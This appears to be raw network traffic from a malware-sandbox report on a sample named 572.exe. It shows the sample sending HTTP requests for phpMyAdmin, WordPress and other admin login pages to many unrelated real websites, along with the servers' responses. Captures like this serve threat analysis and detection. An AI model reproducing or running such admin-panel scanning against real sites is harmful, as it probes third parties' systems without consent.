                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                275192.168.2.65663464.91.249.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.597666979 CET173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.741303921 CET259INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 38 0d 0a 3c 68 31 3e 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 18<h1>404: Not Found</h1>0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                276192.168.2.65661564.190.63.11180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.617278099 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.827147007 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.827696085 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://foros.net/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.042984009 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                277192.168.2.656629185.51.191.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.656656981 CET183OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967649937 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=019fa6765b3e7cece27a9cb77609005d; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:52 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 33 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 334f<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967662096 CET1286INData Raw: 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967674017 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967686892 CET1286INData Raw: 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 61 64 6d 69 6e 2e 70 68 70 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ttp://innovationdevelopment.eu/pl/admin.php" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/admin.php" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/admin.php" /><link h
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967700005 CET1286INData Raw: 74 42 79 49 64 28 27 61 6a 61 78 27 29 2e 73 72 63 3d 27 73 69 74 65 73 2f 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74 6f 27 22 3e 0d 0a 09 09 09 3c 69 6d 67 20 73 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967719078 CET1286INData Raw: 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 49 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967731953 CET1286INData Raw: 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 26 68 3d 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 41 57 5f 63 6f 6f 6b 69 65 5f 61 6c 65 72 74 22 20 73 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: +screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allow
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967756987 CET1286INData Raw: 6f 6f 6b 69 65 73 29 20 6d 61 79 20 70 6c 61 63 65 20 64 75 72 69 6e 67 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72 20 6f 72 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 2c 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967767954 CET1286INData Raw: 2c 20 62 75 74 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 74 68 65 6d 20 62 79 20 74 68 65 20 75 73 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61 62 6c 65 20 74 68 65 20 63 6f 6f 6b 69 65 73 20 61 72 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses c
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967778921 CET1286INData Raw: 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 50 61 72 74 6e 65 72 73 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c 69 6d 67 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 2f 63 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ooter_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35p
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.976114035 CET811INData Raw: 74 3a 32 39 70 78 3b 20 77 69 64 74 68 3a 32 39 70 78 22 20 2f 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 47 65 74 20 74 68 65 20 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="e


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                278192.168.2.656623181.4.228.15580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.698554039 CET188OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967442036 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.967453003 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                279192.168.2.65663741.33.126.10080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.762293100 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.015039921 CET143INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                280192.168.2.656672103.224.182.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.762505054 CET325OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __tad=1707131691.1659755
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.937621117 CET264INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/administrator/index.php?sub1=20240205-2214-52f0-ba33-ad43e9ad61a1
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                281192.168.2.656705192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.823451042 CET176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.927304983 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
